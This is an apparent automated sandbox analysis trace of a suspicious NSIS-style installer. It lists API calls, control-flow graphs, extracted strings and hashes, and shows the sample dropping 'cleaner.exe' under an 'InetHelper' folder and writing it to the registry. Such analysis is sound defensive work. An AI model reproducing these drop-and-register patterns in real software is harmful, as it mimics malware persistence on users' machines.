                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004681E0), ref: 00403D2C
                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004681E0), ref: 00403D39
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403D42
                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$(gD$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                              • API String ID: 606308-2529400235
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00402F60
                                                                                                                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                              • *:o, xrefs: 004031B5
                                                                                                                                                                                                              • Null, xrefs: 00403029
                                                                                                                                                                                                              • Inst, xrefs: 00403017
                                                                                                                                                                                                              • soft, xrefs: 00403020
                                                                                                                                                                                                              • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                              • HA, xrefs: 004030F6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                              • String ID: *:o$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$HA$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                              • API String ID: 2803837635-1291305336
                                                                                                                                                                                                              • Opcode ID: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction ID: d25a53c4d11647cbbad2ea8e7a2610e0d6e301d01d0d9af5663e5c20e349ab0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6cc7feb225d5f91d4cb60b2c7bd5eae8f554926f74471ae7b4f53b82ba7c1c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8610331D01205ABDB209FA4DD85B9E7BA8AB04316F24417BF904F72D1D77C8E808B9D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00002000), ref: 0040654B
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00002000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040655E
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040659A
                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 004065A8
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                              • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,0043E708,?,00405487,0043E708,00000000), ref: 00406631
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                              • API String ID: 717251189-2610422173
                                                                                                                                                                                                              • Opcode ID: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction ID: 4ff03c26a92b18a500a2dba0a5346c99a5613c7aa05bf40b8fc1f2faf6c00e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59612271A00101ABDF209F64DD85AAE37A5AF50314F22813FE507BA2D1EB3D8EA1C75D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,InetHelper,InetHelper,00000000,00000000,InetHelper,004C9000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$InetHelper
                                                                                                                                                                                                              • API String ID: 1941528284-4078307097
                                                                                                                                                                                                              • Opcode ID: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction ID: ededab686cc318fc7e7b90f4c09e4a826d398c1608d56966c744d50d12e1e378
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09b218e5e7aa004988234aef99607d2b4dfa3534dd7724c6f1d49ddbe7db769c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841B571900518BADF107BA5CD85DAF3679EF4532DB20423FF416B10E2DB3C8A929A6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 474 4032de-403306 GetTickCount 475 403436-40343e call 402e8e 474->475 476 40330c-403337 call 40345d SetFilePointer 474->476 481 403440-403444 475->481 482 40333c-40334e 476->482 483 403350 482->483 484 403352-403360 call 403447 482->484 483->484 487 403366-403372 484->487 488 403428-40342b 484->488 489 403378-40337e 487->489 488->481 490 403380-403386 489->490 491 4033a9-4033c5 call 406943 489->491 490->491 492 403388-4033a8 call 402e8e 490->492 497 403431 491->497 498 4033c7-4033cf 491->498 492->491 499 403433-403434 497->499 500 4033d1-4033d9 call 405f90 498->500 501 4033f2-4033f8 498->501 499->481 504 4033de-4033e0 500->504 501->497 503 4033fa-4033fc 501->503 503->497 505 4033fe-403411 503->505 506 4033e2-4033ee 504->506 507 40342d-40342f 504->507 505->482 508 403417-403426 SetFilePointer 505->508 506->489 509 4033f0 506->509 507->499 508->475 509->505
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                                                • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(006F3A2A,00000000,00000000,004266D0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • *:o, xrefs: 004032E1, 004033FE
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00403337, 004033D2
                                                                                                                                                                                                              • 5=B, xrefs: 004033AE, 004033C7
                                                                                                                                                                                                              • HA, xrefs: 004033A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                                                                                              • String ID: *:o$5=B$HA$timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 1092082344-71510955
                                                                                                                                                                                                              • Opcode ID: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction ID: fd4332e341476289c3f76e81f79fa789cc737db0b0adfb813ccc5192894bdc6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b178faf7be8bed1ce1700d2338eadcdcd7a4db5cb59746dbf71c5feed9a6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231B171600211DBC7209F26FE8496A3BA8F7643567C9423BEC40B62E0CB385D11DB1E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 510 406752-406772 GetSystemDirectoryW 511 406774 510->511 512 406776-406778 510->512 511->512 513 406789-40678b 512->513 514 40677a-406783 512->514 516 40678c-4067bf wsprintfW LoadLibraryExW 513->516 514->513 515 406785-406787 514->515 515->516
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 517 406943-406966 518 406970-406973 517->518 519 406968-40696b 517->519 521 406976-40697f 518->521 520 407390-407394 519->520 522 406985 521->522 523 40738d 521->523 524 406a31-406a35 522->524 525 406aa1-406aa5 522->525 526 40698c-406990 522->526 527 406acc-407173 522->527 523->520 528 4072e1-4072eb 524->528 529 406a3b-406a54 524->529 532 4072f0-4072fa 525->532 533 406aab-406abf 525->533 530 406996-4069a3 526->530 531 407378-40738b 526->531 538 407175-40718b 527->538 539 40718d-4071a3 527->539 528->531 535 406a57-406a5b 529->535 530->523 536 4069a9-4069ef 530->536 531->520 532->531 537 406ac2-406aca 533->537 535->524 541 406a5d-406a63 535->541 542 4069f1-4069f5 536->542 543 406a17-406a19 536->543 537->525 537->527 540 4071a6-4071ad 538->540 539->540 544 4071d4-4071e0 540->544 545 4071af-4071b3 540->545 546 406a65-406a6c 541->546 547 406a8d-406a9f 541->547 548 406a00-406a0e GlobalAlloc 542->548 549 4069f7-4069fa GlobalFree 542->549 550 406a27-406a2f 543->550 551 406a1b-406a25 543->551 544->521 552 407362-40736c 545->552 553 4071b9-4071d1 545->553 555 406a77-406a87 GlobalAlloc 546->555 556 406a6e-406a71 GlobalFree 546->556 547->537 548->523 557 406a14 548->557 549->548 550->535 551->550 551->551 552->531 553->544 555->523 555->547 556->555 557->543
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00406943
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 0-1897978588
                                                                                                                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 558 402598-4025aa 559 4025c7-4025ca 558->559 560 4025ac-4025c5 call 402c1f 558->560 562 4025fb-402608 call 402c41 lstrlenW 559->562 563 4025cc-4025f9 call 402c41 WideCharToMultiByte lstrlenA 559->563 569 40260a-402610 560->569 562->569 563->569 570 402616-402621 call 406348 569->570 571 40288b-402ad4 569->571 576 402623-402626 570->576 577 402637-402640 call 405f90 570->577 576->577 579 402628-402631 call 405fbf 576->579 582 402645 577->582 579->571 579->577 582->571
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0040E5D8,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",000000FF,0040E5D8,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe", xrefs: 004025E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 3109718747-1638566638
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 584 4023e4-402415 call 402c41 * 2 call 402cd1 591 402ac5-402ad4 584->591 592 40241b-402425 584->592 593 402427-402434 call 402c41 lstrlenW 592->593 594 402438-40243b 592->594 593->594 596 40243d-40244e call 402c1f 594->596 597 40244f-402452 594->597 596->597 601 402463-402477 RegSetValueExW 597->601 602 402454-40245e call 4031d6 597->602 606 402479 601->606 607 40247c-40255d RegCloseKey 601->607 602->601 606->607 607->591
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 2655323295-1638566638
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 692 4031d6-4031e3 693 403201-40320a call 4032de 692->693 694 4031e5-4031fb SetFilePointer 692->694 697 403210-403223 call 405f61 693->697 698 4032d8-4032db 693->698 694->693 701 4032c8 697->701 702 403229-40323c call 4032de 697->702 704 4032ca-4032cb 701->704 706 403242-403245 702->706 707 4032d6 702->707 704->698 708 4032a4-4032aa 706->708 709 403247-40324a 706->709 707->698 710 4032ac 708->710 711 4032af-4032c6 ReadFile 708->711 709->707 712 403250 709->712 710->711 711->701 713 4032cd-4032d0 711->713 714 403255-40325f 712->714 713->707 715 403261 714->715 716 403266-403278 call 405f61 714->716 715->716 716->701 719 40327a-403281 call 405f90 716->719 721 403286-403288 719->721 722 4032a0-4032a2 721->722 723 40328a-40329c 721->723 722->704 723->714 724 40329e 723->724 724->707
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID: *:o
                                                                                                                                                                                                              • API String ID: 973152223-843036820
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 725 405f0d-405f19 726 405f1a-405f4e GetTickCount GetTempFileNameW 725->726 727 405f50-405f52 726->727 728 405f5d-405f5f 726->728 727->726 729 405f54 727->729 730 405f57-405f5a 728->730 729->730
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004C1000,004034A3,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF), ref: 00405F46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

• Block 731 (4059d1-405a02): CreateProcessW; edges to blocks 732 and 733
• Block 733 (405a04-405a0d): CloseHandle; edge to block 732
• Block 732 (405a10-405a11)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                              Memory Dump Source
• Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
